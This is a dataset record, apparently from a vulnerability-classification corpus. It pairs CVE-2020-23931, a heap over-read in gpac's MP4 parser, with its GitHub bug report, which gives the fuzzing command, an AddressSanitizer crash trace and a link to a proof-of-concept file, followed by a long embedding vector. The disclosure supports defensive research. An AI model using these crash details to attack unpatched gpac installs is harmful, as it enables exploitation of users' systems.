cve_id
stringlengths
13
16
cve_published
timestamp[ns]
cve_descriptions
stringlengths
70
729
cve_metrics
dict
cve_references
listlengths
1
10
cve_configurations
listlengths
1
5
url
stringlengths
40
77
cve_tags
sequencelengths
1
4
domain
stringclasses
1 value
issue_owner_repo
sequencelengths
2
2
issue_body
stringlengths
0
7.94k
issue_title
stringlengths
1
307
issue_comments_url
stringlengths
59
81
issue_comments_count
int64
0
146
issue_created_at
timestamp[ns]
issue_updated_at
stringlengths
20
20
issue_html_url
stringlengths
40
62
issue_github_id
int64
128M
1.01B
issue_number
int64
94
105k
label
bool
2 classes
issue_msg
stringlengths
120
8.13k
issue_msg_n_tokens
int64
120
8.13k
issue_embedding
sequencelengths
3.07k
3.07k
__index_level_0__
int64
0
3.61k
CVE-2020-23931
2021-04-21T18:15:08.460000
An issue was discovered in gpac before 1.0.1. The abst_box_read function in box_code_adobe.c has a heap-based buffer over-read.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.2, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Technical Description", "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/126.html" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/093283e727f396130651280609e687cd4778e0d1" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1564" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1567" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCA1FE1D-17AE-45F9-A7BD-A8316EE859D6", "versionEndExcluding": "1.0.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1567
[ "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
## System info Ubuntu x86_64, gcc (Ubuntu 5.5.0-12ubuntu1), MP4Box (latest master [2aa266](https://github.com/gpac/gpac/commit/2aa266dfaab6aaad9f9f4f216ad7d1e62adc7fa0)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure --static-mp4box ## Command line ./bin/gcc/MP4Box -diso -out /dev/null @@ ## AddressSanitizer output ``` ================================================================= ==38343==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60600000ec94 at pc 0x7f6ebd7a53d5 bp 0x7ffd9261d2c0 sp 0x7ffd9261ca68 READ of size 53 at 0x60600000ec94 thread T0 #0 0x7f6ebd7a53d4 in strdup (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x623d4) #1 0x562152c228bf in abst_box_read isomedia/box_code_adobe.c:155 #2 0x562152a11b64 in gf_isom_box_read isomedia/box_funcs.c:1681 #3 0x562152a11b64 in gf_isom_box_parse_ex isomedia/box_funcs.c:259 #4 0x562152a13041 in gf_isom_parse_root_box isomedia/box_funcs.c:38 #5 0x562152a4a6f5 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:259 #6 0x562152a55951 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:247 #7 0x562152a55951 in gf_isom_open_file isomedia/isom_intern.c:740 #8 0x56215237f7e3 in mp4boxMain /home/seviezhou/gpac/applications/mp4box/main.c:5331 #9 0x7f6ebc76fb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #10 0x562152350f09 in _start (/home/seviezhou/gpac/bin/gcc/MP4Box+0x27ff09) 0x60600000ec94 is located 0 bytes to the right of 52-byte region [0x60600000ec60,0x60600000ec94) allocated by thread T0 here: #0 0x7f6ebd7db612 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98612) #1 0x562152c203a9 in abst_box_read isomedia/box_code_adobe.c:97 SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 strdup Shadow bytes around the buggy address: 0x0c0c7fff9d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9d60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9d70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa 00 00 00 00 =>0x0c0c7fff9d90: 00 00[04]fa fa fa fa fa 00 00 00 00 00 00 00 fa 0x0c0c7fff9da0: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa 0x0c0c7fff9db0: 00 00 00 00 00 00 00 03 fa fa fa fa 00 00 00 00 0x0c0c7fff9dc0: 00 00 02 fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c0c7fff9dd0: fa fa fa fa fd fd fd fd fd fd fd fa fa fa fa fa 0x0c0c7fff9de0: fd fd fd fd fd fd fd fd fa fa fa fa 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==38343==ABORTING ``` ## POC [heap-overflow-abst_box_read-box_code_adobe-155.zip](https://github.com/gpac/gpac/files/5039343/heap-overflow-abst_box_read-box_code_adobe-155.zip)
A heap-buffer-overflow in box_code_adobe.c:155
https://api.github.com/repos/gpac/gpac/issues/1567/comments
1
2020-08-07T04:38:51
2020-09-01T15:06:33Z
https://github.com/gpac/gpac/issues/1567
674,751,358
1,567
true
This is a GitHub Issue repo:gpac owner:gpac Title : A heap-buffer-overflow in box_code_adobe.c:155 Issue date: --- start body --- ## System info Ubuntu x86_64, gcc (Ubuntu 5.5.0-12ubuntu1), MP4Box (latest master [2aa266](https://github.com/gpac/gpac/commit/2aa266dfaab6aaad9f9f4f216ad7d1e62adc7fa0)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure --static-mp4box ## Command line ./bin/gcc/MP4Box -diso -out /dev/null @@ ## AddressSanitizer output ``` ================================================================= ==38343==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60600000ec94 at pc 0x7f6ebd7a53d5 bp 0x7ffd9261d2c0 sp 0x7ffd9261ca68 READ of size 53 at 0x60600000ec94 thread T0 #0 0x7f6ebd7a53d4 in strdup (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x623d4) #1 0x562152c228bf in abst_box_read isomedia/box_code_adobe.c:155 #2 0x562152a11b64 in gf_isom_box_read isomedia/box_funcs.c:1681 #3 0x562152a11b64 in gf_isom_box_parse_ex isomedia/box_funcs.c:259 #4 0x562152a13041 in gf_isom_parse_root_box isomedia/box_funcs.c:38 #5 0x562152a4a6f5 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:259 #6 0x562152a55951 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:247 #7 0x562152a55951 in gf_isom_open_file isomedia/isom_intern.c:740 #8 0x56215237f7e3 in mp4boxMain /home/seviezhou/gpac/applications/mp4box/main.c:5331 #9 0x7f6ebc76fb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #10 0x562152350f09 in _start (/home/seviezhou/gpac/bin/gcc/MP4Box+0x27ff09) 0x60600000ec94 is located 0 bytes to the right of 52-byte region [0x60600000ec60,0x60600000ec94) allocated by thread T0 here: #0 0x7f6ebd7db612 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98612) #1 0x562152c203a9 in abst_box_read isomedia/box_code_adobe.c:97 SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 strdup Shadow bytes around the buggy address: 0x0c0c7fff9d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9d60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9d70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa 00 00 00 00 =>0x0c0c7fff9d90: 00 00[04]fa fa fa fa fa 00 00 00 00 00 00 00 fa 0x0c0c7fff9da0: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa 0x0c0c7fff9db0: 00 00 00 00 00 00 00 03 fa fa fa fa 00 00 00 00 0x0c0c7fff9dc0: 00 00 02 fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c0c7fff9dd0: fa fa fa fa fd fd fd fd fd fd fd fa fa fa fa fa 0x0c0c7fff9de0: fd fd fd fd fd fd fd fd fa fa fa fa 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==38343==ABORTING ``` ## POC [heap-overflow-abst_box_read-box_code_adobe-155.zip](https://github.com/gpac/gpac/files/5039343/heap-overflow-abst_box_read-box_code_adobe-155.zip) --- end body ---
3,581
[ -0.021654607728123665, 0.04477987065911293, -0.008096092380583286, 0.011412563733756542, 0.032564450055360794, 0.016132157295942307, -0.028872810304164886, 0.04474985599517822, -0.02163960225880146, 0.021009322255849838, -0.012905726209282875, 0.01365605928003788, 0.029022878035902977, 0.013821132481098175, 0.024625927209854126, 0.01345346961170435, -0.01286820974200964, 0.02199976146221161, 0.0012267943238839507, 0.002748094266280532, 0.03445528820157051, -0.04742104187607765, -0.013603536412119865, 0.0461304672062397, -0.016102144494652748, 0.02515115961432457, -0.02317028120160103, 0.009874381124973297, 0.0111649539321661, 0.03877720609307289, -0.0063853333704173565, 0.013018276542425156, -0.016612371429800987, 0.02006390318274498, 0.03400508686900139, 0.009566744789481163, 0.04234879091382027, 0.08283675462007523, -0.010219534859061241, 0.012177903205156326, 0.0055374568328261375, -0.05939635634422302, -0.030223410576581955, 0.012500546872615814, 0.006963089574128389, 0.011224980466067791, 0.026096578687429428, -0.0037291545886546373, -0.04045795276761055, -0.00794602558016777, 0.02713203802704811, -0.011104927398264408, -0.028392598032951355, -0.05168293043971062, 0.000401428114855662, -0.012140386737883091, 0.02357546053826809, 0.01706257089972496, 0.003021965967491269, 0.022795114666223526, -0.025571346282958984, 0.01782791130244732, 0.004100569523870945, 0.03313470259308815, -0.014691518619656563, -0.007758442312479019, 0.016057124361395836, 0.03169406205415726, -0.012372990138828754, 0.029818231239914894, -0.002414196263998747, -0.033224742859601974, 0.02921796403825283, 0.053033530712127686, 0.008441245183348656, -0.010864821262657642, 0.032564450055360794, 0.020964302122592926, -0.03760668635368347, 0.040728069841861725, -0.054834332317113876, 0.030508536845445633, -0.03071863017976284, 0.03949752449989319, 0.01403872948139906, 0.0018326882272958755, -0.041028205305337906, -0.07767446339130402, -0.03049352951347828, -0.04300908371806145, 0.008343702182173729, 0.028092464432120323, 0.008051072247326374, 0.0028587684500962496, 0.008036065846681595, 0.018608257174491882, -0.027507204562425613, -0.009304128587245941, -0.052553318440914154, -0.011712697334587574, -0.026786886155605316, -0.01731768436729908, -0.013828636147081852, 0.007668402511626482, -0.006677963305264711, 0.010024447925388813, 0.008568801917135715, -0.025466300547122955, 0.0018533223774284124, 0.11879271268844604, 0.008501271717250347, 0.01650732383131981, 0.006632943172007799, 0.04775118827819824, 0.0004593444464262575, 0.018668282777071, -0.013746099546551704, -0.015576912090182304, -0.03292460739612579, -0.02764226496219635, 0.005072250496596098, -0.03463536873459816, -0.023755541071295738, 0.012357983738183975, -0.00466707069426775, 0.03151398152112961, -0.0006143350619822741, 0.0009379161638207734, -0.01378361601382494, -0.026486752554774284, -0.04925185441970825, -0.02629166655242443, -0.0014509563334286213, -0.0270870178937912, -0.016942517831921577, -0.004006777890026569, -0.018323130905628204, 0.038567110896110535, 0.015456858091056347, 0.037036433815956116, -0.06843036413192749, -0.01955367624759674, 0.017917949706315994, -0.0032470657024532557, -0.01826310344040394, 0.006602929905056953, 0.00966428779065609, 0.04183856397867203, -0.028572678565979004, -0.0032695757690817118, 0.011262496933341026, -0.026051558554172516, 0.009626771323382854, 0.03847707435488701, 0.059516407549381256, 0.004291904158890247, 0.025031106546521187, 0.03292460739612579, -0.01563693769276142, -0.00590512016788125, -0.010182017460465431, -0.042378805577754974, 0.010849813930690289, -0.009184075519442558, -0.038897257298231125, -0.03523563593626022, 0.050032198429107666, 0.014076245948672295, -0.00924410205334425, 0.025256207212805748, 0.002898160833865404, -0.006317803170531988, 0.023260321468114853, 0.03469539433717728, -0.0585859939455986, -0.009836864657700062, 0.03751664608716965, 0.021924728527665138, -0.031183836981654167, -0.006415346637368202, -0.02317028120160103, 0.0259915329515934, 0.024040667340159416, 0.004366937559098005, 0.00990439485758543, -0.014939128421247005, 0.021579574793577194, -0.050212278962135315, 0.020228976383805275, -0.0048696608282625675, -0.007916012778878212, -0.015216751955449581, -0.004066804423928261, -0.018173063173890114, 0.06891057640314102, -0.020003875717520714, -0.03730655461549759, -0.0039429995231330395, 0.003121384885162115, 0.0263666994869709, 0.002946932567283511, -0.00860631838440895, -0.030298443511128426, 0.012357983738183975, -0.03694639354944229, 0.009469201788306236, -0.012087863869965076, 0.035895928740501404, 0.02830255776643753, 0.0035246890038251877, -0.011847756803035736, -0.009754328057169914, 0.017542783170938492, 0.0066254399716854095, -0.009101537987589836, 0.01691250503063202, -0.03400508686900139, -0.0022528746630996466, -0.03979765996336937, -0.009371657855808735, 0.02990827150642872, -0.0057850671000778675, -0.0022191095631569624, -0.019943850114941597, -0.03334479406476021, -0.00865884218364954, -0.013753602281212807, 0.013753602281212807, -0.01248553954064846, 0.011074913665652275, 0.023965634405612946, 0.020694181323051453, 0.0217896681278944, 0.0012155392905697227, 0.024370813742280006, -0.006141474936157465, -0.0017135728849098086, 0.011285006999969482, 0.0038210705388337374, 0.00979184452444315, -0.022600028663873672, 0.0263666994869709, -0.014984148554503918, -0.02749219909310341, 0.013821132481098175, 0.07737433165311813, -0.017782891169190407, -0.011795233935117722, -0.02090427465736866, 0.01385864894837141, 0.006295293103903532, -0.00025652008480392396, 0.014436405152082443, 0.008246159180998802, 0.008291179314255714, -0.00364661798812449, 0.01767784357070923, 0.00682802964001894, -0.008808908984065056, -0.016492318361997604, 0.019973862916231155, 0.002607407048344612, -0.026936952024698257, 0.007274477742612362, -0.009086531586945057, -0.016642384231090546, 0.004798379261046648, 0.011059907265007496, -0.013408449478447437, -0.010722257196903229, 0.044029537588357925, -0.012748156674206257, -0.01797797717154026, -0.024911053478717804, 0.0022059788461774588, 0.01983880251646042, 0.0001650732447160408, 0.014894108287990093, 0.008591311983764172, -0.004764614161103964, -0.006749244872480631, 0.0060139186680316925, 0.009934407658874989, 0.016102144494652748, -0.0014443908585235476, -0.03097374364733696, 0.0028925335500389338, 0.024670947343111038, -0.016342250630259514, 0.003988019656389952, 0.0017313932767137885, 0.012125380337238312, -0.043699391186237335, 0.016627376899123192, 0.012380493804812431, 0.011585140600800514, -0.011922790668904781, -0.004745855927467346, -0.009581751190125942, 0.0003671941813081503, -0.03133390471339226, 0.008801405318081379, -0.02039404958486557, -0.002766852732747793, -0.03601597994565964, 0.021249428391456604, -0.05231321230530739, 0.016282225027680397, -0.01449643261730671, -0.0032264315523207188, 0.03763670101761818, -0.05264335870742798, -0.030193397775292397, -0.002993828384205699, -0.024851026013493538, -0.01469902228564024, 0.00028653338085860014, -0.008051072247326374, -0.0037310305051505566, 0.016567351296544075, -0.023740533739328384, 0.01800798997282982, -0.027432171627879143, 0.01265061367303133, 0.032894596457481384, 0.005421155598014593, -0.03463536873459816, 0.010519667528569698, -0.08007553219795227, 0.013288396410644054, -0.004276897758245468, -0.01596708409488201, 0.016342250630259514, -0.046190496534109116, 0.007803462445735931, -0.021684622392058372, -0.02939804457128048, 0.007653396110981703, 0.013918675482273102, 0.01285320334136486, -0.011600147001445293, 0.01695752516388893, 0.024010654538869858, 0.006569164805114269, -0.02380056120455265, -0.01403872948139906, 0.007206948008388281, -0.001988382311537862, -0.0051435320638120174, -0.0030726133845746517, 0.0010054460726678371, 0.03628610074520111, 0.018683290109038353, 0.04477987065911293, 0.003205797402188182, -0.012568076141178608, -0.01764783076941967, -0.014323855750262737, 0.00465956749394536, -0.008973982185125351, -0.012695632874965668, -0.023185286670923233, -0.006737989839166403, 0.014563961885869503, 0.011817744001746178, 0.005248578730970621, 0.0029975799843668938, -0.004884667228907347, -0.0013477855827659369, 0.002164710545912385, -0.04646061360836029, 0.04078809916973114, -0.031033769249916077, 0.028512651100754738, -0.0012586835073307157, -0.02639671228826046, 0.009499214589595795, 0.022029774263501167, -0.018293116241693497, 0.018143050372600555, -0.04108823090791702, 0.02825753763318062, 0.03967760503292084, -0.05348373204469681, 0.00551869859918952, 0.01135253719985485, -0.022359920665621758, 0.04634056240320206, -0.018293116241693497, -0.033224742859601974, -0.05423406511545181, 0.05285345017910004, -0.018398163840174675, -0.06320804357528687, -0.015119208954274654, 0.029773211106657982, -0.01566695235669613, -0.023020213469862938, 0.024370813742280006, -0.05498439818620682, 0.04742104187607765, -0.010309574194252491, -0.0005566532490774989, 0.030598577111959457, -0.003969261422753334, 0.04117827117443085, 0.0006767064915038645, -0.009431685321033001, 0.03232434391975403, -0.0050872573629021645, 0.02852765843272209, 0.009896891191601753, -0.01127750426530838, 0.012890719808638096, 0.04018783196806908, 0.008043568581342697, -0.0054811821319162846, 0.00734951114282012, -0.03898729756474495, 0.04264892265200615, -0.017557790502905846, -0.005304853897541761, 0.002080298028886318, 0.008013555780053139, 0.02273508720099926, 0.027852358296513557, -0.01195280347019434, 0.017002543434500694, 0.01907346397638321, -0.013911172747612, 0.002127193845808506, -0.0006138661410659552, -0.021099362522363663, -0.00860631838440895, 0.007289484608918428, -0.0355057530105114, -0.04712090641260147, -0.050512414425611496, -0.022615034133195877, 0.0015222379006445408, -0.023965634405612946, 0.024986086413264275, -0.004006777890026569, -0.038026873022317886, 0.017857924103736877, -0.057205382734537125, -0.022314900532364845, -0.0057550533674657345, 0.01643229089677334, -0.016237204894423485, -0.03778676688671112, 0.006674211472272873, -0.013866152614355087, -0.002584896981716156, 0.004198112525045872, -0.011300014331936836, -0.021684622392058372, -0.010076971724629402, 0.024430839344859123, -0.00478712422773242, 0.0038529594894498587, 0.009199081920087337, 0.01604211889207363, -0.006554157938808203, 0.03529566153883934, 0.051052652299404144, -0.017122598364949226, -0.030298443511128426, 0.003686010604724288, -0.02840760536491871, 0.006017670035362244, 0.02774731256067753, 0.011014887131750584, -0.016417285427451134, 0.011134941130876541, 0.030478524044156075, 0.014849089086055756, -0.018698297441005707, -0.010849813930690289, -0.06110711395740509, -0.0013412201078608632, -0.028437618166208267, -0.010699747130274773, 0.00044996527140028775, 0.0097018051892519, -0.01632724516093731, -0.028977857902646065, 0.004130582790821791, 0.004637057427316904, 0.007000606041401625, 0.03901731222867966, 0.008636332117021084, -0.00387171795591712, -0.031543996185064316, 0.01604211889207363, 0.0030444758012890816, -0.023605473339557648, 0.01578700542449951, 0.028497645631432533, 0.013626046478748322, 0.005533705465495586, -0.03892727196216583, 0.0190434493124485, 0.010654727928340435, 0.037726741284132004, -0.04745105281472206, -0.04757110774517059, 0.051382798701524734, -0.011232484132051468, -0.025196179747581482, -0.024956073611974716, -0.0020352781284600496, 0.006036428268998861, -0.023740533739328384, -0.017302677035331726, -0.025901492685079575, 0.025856472551822662, -0.006501635070890188, 0.036976408213377, 0.021444514393806458, -0.009094035252928734, -0.019598696380853653, -0.017437737435102463, 0.028947845101356506, 0.03340482339262962, 0.004757110960781574, 0.0223299078643322, -0.008538789115846157, 0.03178410232067108, -0.011217477731406689, -0.009439188055694103, 0.002127193845808506, -0.023950627073645592, 0.008366212248802185, 0.002521118614822626, -0.008553795516490936, -0.0028568925336003304, 0.023035220801830292, 0.009986931458115578, -0.012433016672730446, -0.019568683579564095, 0.03610602021217346, -0.02815249189734459, 0.022119814530014992, -0.033734969794750214, 0.014526445418596268, 0.001646042917855084, 0.012365486472845078, -0.0063853333704173565, -0.0028944092337042093, 0.0011001756647601724, -0.0027255844324827194, 0.014181292615830898, 0.027987418696284294, 0.011194967664778233, 0.009124048054218292, -0.008771391585469246, -0.001037335256114602, 0.0015897678676992655, 0.01695752516388893, -0.00017796958854887635, -0.0012765038991346955, -0.0010823552729561925, -0.021174395456910133, -0.011194967664778233, -0.003057606751099229, -0.010767277330160141, 0.03502554073929787, -0.027417166158556938, -0.0099794277921319, 0.005049740429967642, -0.0069105662405490875, 0.045530203729867935, -0.005998911801725626, -0.0034815447870641947, 0.004509500693529844, 0.0041718510910868645, -0.0043256692588329315, 0.001382488408125937, -0.029863251373171806, 0.007976039312779903, -0.0428290031850338, -0.014323855750262737, -0.0003364774165675044, 0.02408568747341633, -0.028602691367268562, -0.004880915861576796, 0.028857804834842682, -0.0032883340027183294, -0.013918675482273102, 0.008043568581342697, 0.02273508720099926, -0.015366818755865097, -0.01871330291032791, 0.0004928749403916299, -0.021504541859030724, 0.01398620568215847, -0.001480969600379467, -0.0005622807657346129, 0.004524507559835911, -0.023095248267054558, 0.04967204108834267, 0.009379161521792412, -0.026411719620227814, -0.022284887731075287, 0.015907058492302895, 0.022464968264102936, -0.003016338450834155, -0.02654678001999855, 0.048891693353652954, 0.0021290697623044252, 0.019853809848427773, 0.02767227776348591, -0.011014887131750584, 0.012718142941594124, -0.021924728527665138, 0.029383037239313126, 0.013333416543900967, -0.00024409267643932253, 0.021954741328954697, 0.031543996185064316, -0.05879608914256096, 0.019823795184493065, -0.026201626285910606, 0.00827617198228836, 0.019898829981684685, -0.01589205116033554, -0.03676631301641464, -0.014248822815716267, -0.01815805770456791, -0.016717417165637016, 0.04859156161546707, 0.016087137162685394, -0.029638150706887245, -0.018728310242295265, 0.008223649114370346, 0.028272544965147972, -0.012838196009397507, -0.015516884624958038, -0.010227037593722343, 0.002718080999329686, -0.0017820406937971711, -0.023515434935688972, -0.003822946222499013, -0.020814236253499985, 0.007968535646796227, 0.009694301523268223, -0.020364034920930862, 0.026936952024698257, 0.02489604614675045, -0.036196060478687286, -0.010474647395312786, 0.009656785055994987, 0.01731768436729908, 0.019088469445705414, -0.006467869970947504, 0.040698058903217316, 0.0428290031850338, -0.0012267943238839507, -0.017122598364949226, -0.012530559673905373, -0.04441970959305763, -0.009619268588721752, 0.007113156374543905, 0.00808858871459961, 0.0009716811473481357, -0.028677724301815033, 0.0056237452663481236, 0.022419948130846024, 0.013926179148256779, 0.00030060214339755476, 0.005950140301138163, 0.01863826997578144, 0.00047106840065680444, 0.0018336260691285133, -0.02540627308189869, 0.010924847796559334, 0.02548130601644516, -0.023605473339557648, -0.005822583567351103, 0.005282343830913305, -0.000724540208466351, 0.008591311983764172, 0.0009885636391118169, -0.033554889261722565, 0.007184437941759825, 0.0012436768738552928, -0.012590586207807064, -0.03328476846218109, -0.019388603046536446, 0.035415712743997574, -0.016387270763516426, 0.025421280413866043, 0.02852765843272209, -0.005661261733621359, -0.021549561992287636, 0.007379524409770966, 0.003770422888919711, -0.0033408573362976313, -0.005923878401517868, -0.036556221544742584, 0.012568076141178608, -0.0016788699431344867, -0.028677724301815033, 0.01094735786318779, 0.024400826543569565, -0.0018608256941661239, 0.014849089086055756, 0.021954741328954697, -0.012162896804511547, -0.012793176807463169, 0.01841316930949688, -0.022464968264102936, 0.02815249189734459, 0.0055562155321240425, -0.02716205269098282, 0.0020934289786964655, -0.01464649848639965, -0.007901005446910858, 0.01589205116033554, -0.023515434935688972, -0.02642672508955002, -0.020619148388504982, -0.038537099957466125, 0.00023565143055748194, -0.005271088797599077, -0.010722257196903229, 0.013160839676856995, 0.004145589657127857, 0.010392110794782639, -0.013941185548901558, -0.028827792033553123, 0.00630654813721776, 0.014744042418897152, 0.01228294987231493, -0.0006809271289967, 0.024580907076597214, -0.005297350697219372, 0.00990439485758543, 0.03175409138202667, 0.006051435135304928, -0.003218928351998329, 0.016462303698062897, -0.03457534313201904, 0.001698566135019064, -0.007199444342404604, 0.009641777724027634, 0.004742104094475508, -0.04880165308713913, 0.02888781763613224, 0.014811571687459946, 0.03418516740202904, 0.009236598387360573, -0.03667627274990082, -0.027552224695682526, -0.010287064127624035, 0.028842797502875328, 0.004351931158453226, 0.0009440126013942063, -0.007720925845205784, -0.0032564448192715645, 0.0129957664757967, 0.0033746224362403154, 0.003021965967491269, 0.0023954377975314856, -0.00315327406860888, 0.019778776913881302, -0.007244464475661516, 0.028032438829541206, -0.005413651932030916, 0.007098149508237839, -0.00025347183691337705, -0.040037766098976135, 0.00952172465622425, 0.020844249054789543, -0.040367912501096725, 0.010977370664477348, 0.014714028686285019, 0.0172126367688179, 0.02917294390499592, -0.022615034133195877, 0.0018392535857856274, -0.05480431765317917, 0.019433623179793358, -0.00014385288523044437, -0.013408449478447437, 0.0232453141361475, -0.010467144660651684, -0.006858042906969786, 0.008703862316906452, 0.013273390009999275, 0.001193967298604548, 0.03361491486430168, -0.025466300547122955, -0.0016544840764254332, -0.019358590245246887, 0.009656785055994987, -0.0007343883626163006, -0.0052298204973340034, 0.0001580388779984787, 0.014669008553028107, 0.02115938812494278, -0.0245358869433403, -0.040037766098976135, -0.012365486472845078, -0.023335354402661324, -0.022119814530014992, 0.02804744429886341, -0.018428176641464233, 0.012500546872615814, -0.002164710545912385, -0.0009369782637804747, 0.029338017106056213, 0.0018561361357569695, 0.008666344918310642, -0.0009510469972155988, 0.01175021380186081, -0.015149221755564213, 0.010339587926864624, 0.014121266081929207, -0.01436887588351965, 0.012095366604626179, 0.009874381124973297, -0.053003519773483276, 0.011442577466368675, -0.023485420271754265, 0.0008783584926277399, 0.014076245948672295, 0.005811328534036875, 0.018668282777071, -0.014361372217535973, -0.020108923316001892, 0.004025536123663187, 0.03715648502111435, -0.0025398770812898874, 0.020949294790625572, -0.013911172747612, -0.0022735088132321835, -0.011787730269134045, 0.03277454152703285, -0.03071863017976284, 0.004903425928205252, -0.02629166655242443, -0.02273508720099926, 0.005083505529910326, -0.028692731633782387, -0.0063853333704173565, 0.004644560627639294, 0.006404091604053974, -0.014076245948672295, 0.017107591032981873, 0.040397923439741135, -0.01352850254625082, 0.018022997304797173, -0.010504661127924919, 0.009716811589896679, -0.013318409211933613, -0.021504541859030724, 0.0309437308460474, -0.010767277330160141, 0.0269069392234087, 0.019418615847826004, -0.010136998258531094, 0.0032526932191103697, 0.027011984959244728, 0.004340676125138998, -0.005514947231858969, -0.04009779170155525, 0.013821132481098175, -0.026711853221058846, -0.023230306804180145, -0.00774343591183424, 0.008831419050693512, 0.010999880731105804, -0.031543996185064316, -0.01409875601530075, 0.023365367203950882, 0.0017857924103736877, 0.003410263219848275, 0.03181411698460579, -0.0005083505529910326, 0.020934289321303368, -0.008763888850808144, 0.023485420271754265, 0.025286220014095306, -0.042018644511699677, -0.006640446372330189, -0.023200294002890587, -0.03523563593626022, 0.0069855996407568455, 0.013536006212234497, -0.0120803602039814, -0.034875474870204926, -0.023110253736376762, 0.03583589941263199, 0.03832700476050377, -0.015209248289465904, -0.03166405111551285, -0.014578969217836857, -0.02657679282128811, -0.005875106900930405, -0.0053273639641702175, 0.01252305693924427, -0.0024160719476640224, -0.03160402178764343, 0.020664168521761894, 0.04345928505063057, 0.000820207700598985, 0.0053723836317658424, 0.027582239359617233, 0.018203075975179672, 0.008343702182173729, -0.0223299078643322, -0.0314839705824852, -0.024325793609023094, -0.011915287002921104, -0.03526564687490463, 0.021624594926834106, 0.0009932531975209713, 0.03727653995156288, 0.00946169812232256, -0.004438219126313925, -0.017557790502905846, 0.029533104971051216, -0.0009576124139130116, -0.018908390775322914, -0.03730655461549759, 0.0075858659110963345, -0.00432942109182477, 0.003211424918845296, 0.004689580760896206, -0.015134215354919434, -0.002990076784044504, 0.011990319937467575, 0.01229795627295971, 0.004408205859363079, -0.0512627474963665, -0.004520755726844072, -0.003031345084309578, -0.03994772583246231, -0.009986931458115578, 0.01731768436729908, 0.024145713075995445, 0.003950502723455429, -0.01411376241594553, 0.00799854937940836, -0.005770060233771801, -0.025016099214553833, -0.006051435135304928, -0.04300908371806145, -0.02705700509250164, -0.015044175088405609, 